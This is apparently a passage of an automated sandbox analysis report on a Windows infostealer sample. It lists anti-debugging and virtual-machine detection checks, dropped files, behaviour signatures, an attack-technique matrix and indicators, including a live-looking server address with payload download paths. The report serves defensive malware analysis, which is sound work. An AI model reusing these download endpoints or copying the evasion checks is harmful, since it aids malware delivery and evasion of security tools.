                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F162F second address: 49F1635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1635 second address: 49F1639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F1639 second address: 49F169A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCC16FE5F4Ch 0x0000000e jmp 00007FCBA4817E7Fh 0x00000013 or dword ptr [edx+38h], FFFFFFFFh 0x00000017 pushad 0x00000018 pushad 0x00000019 mov esi, 06740FA1h 0x0000001e pushfd 0x0000001f jmp 00007FCBA4817E7Eh 0x00000024 adc ax, 1738h 0x00000029 jmp 00007FCBA4817E7Bh 0x0000002e popfd 0x0000002f popad 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FCBA4817E7Eh 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F169A second address: 49F16ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d jmp 00007FCBA46BC746h 0x00000012 pop esi 0x00000013 pushad 0x00000014 mov di, ax 0x00000017 mov ch, C1h 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push edx 0x0000001f mov bx, si 0x00000022 pop eax 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FCBA46BC743h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4739DC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 69E98A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005F2B1C rdtsc 1_2_005F2B1C
                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exe TID: 4312Thread sleep count: 74 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1408Thread sleep time: -42021s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4312Thread sleep count: 68 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6380Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4312Thread sleep count: 160 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 4312Thread sleep count: 126 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 7440Thread sleep time: -36000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6176Thread sleep time: -38019s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6384Thread sleep time: -50025s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6504Thread sleep time: -40020s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 6448Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00417727 FindFirstFileExW,1_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_10007EA9 FindFirstFileExW,1_2_10007EA9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0494798E FindFirstFileExW,1_2_0494798E
                Source: file.exe, file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000001.00000002.2026166176.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq\]
                Source: Amcache.hve.14.drBinary or memory string: VMware
                Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: file.exe, 00000001.00000002.2024454401.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000C08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.14.drBinary or memory string: vmci.sys
                Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.14.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.14.drBinary or memory string: VMware20,1
                Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: Amcache.hve.14.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_005F2B1C rdtsc 1_2_005F2B1C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,1_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_10007A76 mov eax, dword ptr fs:[00000030h]1_2_10007A76
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_10005F25 mov eax, dword ptr fs:[00000030h]1_2_10005F25
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_04787D41 push dword ptr fs:[00000030h]1_2_04787D41
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_04930D90 mov eax, dword ptr fs:[00000030h]1_2_04930D90
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0493092B mov eax, dword ptr fs:[00000030h]1_2_0493092B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00402EE0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,1_2_00402EE0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040A720 SetUnhandledExceptionFilter,1_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10002ADF
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_100056A0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_10002FDA
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_04939C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_04939C91
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0493A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0493A7F1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0493D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0493D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0493A987 SetUnhandledExceptionFilter,1_2_0493A987
                Source: file.exe, 00000001.00000002.2023887515.00000000005F1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 4Program Manager
                Source: file.exeBinary or memory string: d+4Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040A2EC cpuid 1_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,1_2_00410822
                Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.14.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                2
                Process Injection
                11
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                2
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                24
                Virtualization/Sandbox Evasion
                LSASS Memory781
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media12
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                Process Injection
                Security Account Manager24
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Deobfuscate/Decode Files or Information
                NTDS3
                Process Discovery
                Distributed Component Object ModelInput Capture111
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
                Software Packing
                Cached Domain Credentials223
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Timestomp
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe32%ReversingLabsWin32.Infostealer.Tinba
                file.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]0%ReversingLabs
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://185.156.72.65/soft/downloadfalse
                  high
                  http://185.156.72.65/dll/keyfalse
                    high
                    http://185.156.72.65/files/downloadfalse
                      high
                      http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
                        high
                        http://185.156.72.65/dll/downloadfalse
                          high
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://upx.sf.netAmcache.hve.14.drfalse
                            high
                            http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.drfalse
                              high
                              https://iplogger.org/1Pz8p7file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.drfalse
                                high
                                https://g-cleanit.hkfile.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.drfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.156.72.65
                                  unknownRussian Federation
                                  44636ITDELUXE-ASRUtrue
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1565534
                                  Start date and time:2024-11-30 05:34:11 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 41s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:20
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@2/15@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: file.exe
                                  TimeTypeDescription
                                  01:29:17API Interceptor92x Sleep call for process: file.exe modified
                                  01:30:02API Interceptor1x Sleep call for process: WerFault.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.156.72.65file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65/soft/download
                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                                  • 185.156.72.65/files/download
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65/soft/download
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                  • 185.156.72.65/soft/download
                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                  • 185.156.72.65/files/download
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65/soft/download
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                  • 185.156.72.65/soft/download
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65/soft/download
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65/soft/download
                                  file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                  • 185.156.72.65/files/download
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                  • 185.156.72.65
                                  file.exeGet hashmaliciousNymaimBrowse
                                  • 185.156.72.65
                                  No context
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]file.exeGet hashmaliciousNymaimBrowse
                                    file.exeGet hashmaliciousNymaimBrowse
                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                        file.exeGet hashmaliciousNymaimBrowse
                                          file.exeGet hashmaliciousNymaimBrowse
                                            file.exeGet hashmaliciousNymaimBrowse
                                              file.exeGet hashmaliciousNymaimBrowse
                                                file.exeGet hashmaliciousNymaimBrowse
                                                  file.exeGet hashmaliciousNymaimBrowse
                                                    file.exeGet hashmaliciousNymaimBrowse
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9712200116189755
                                                      Encrypted:false
                                                      SSDEEP:192:lcH2JnUvHPY005odXP3judvszuiFEZ24IO8TOB:2nH65od/jPzuiFEY4IO8C
                                                      MD5:E7BE6950296140EB8A6AD2A04F1549CF
                                                      SHA1:31176DC50554AA9A60EC89DC28D1064788A4C30A
                                                      SHA-256:4687F331F2DB569FB7B295FEDB14D93AF81B8D36A8E351ACD01DC712F898CE40
                                                      SHA-512:14917CD73F03F4F4352B690E13CEA2E4E4C9B719870BBA08449ED850B952DB3D7D599452B7EEA660BD7FCDFF2EF26306E2F350370A68B14F12EBC1261D2CD77D
                                                      Malicious:true
                                                      Reputation:low
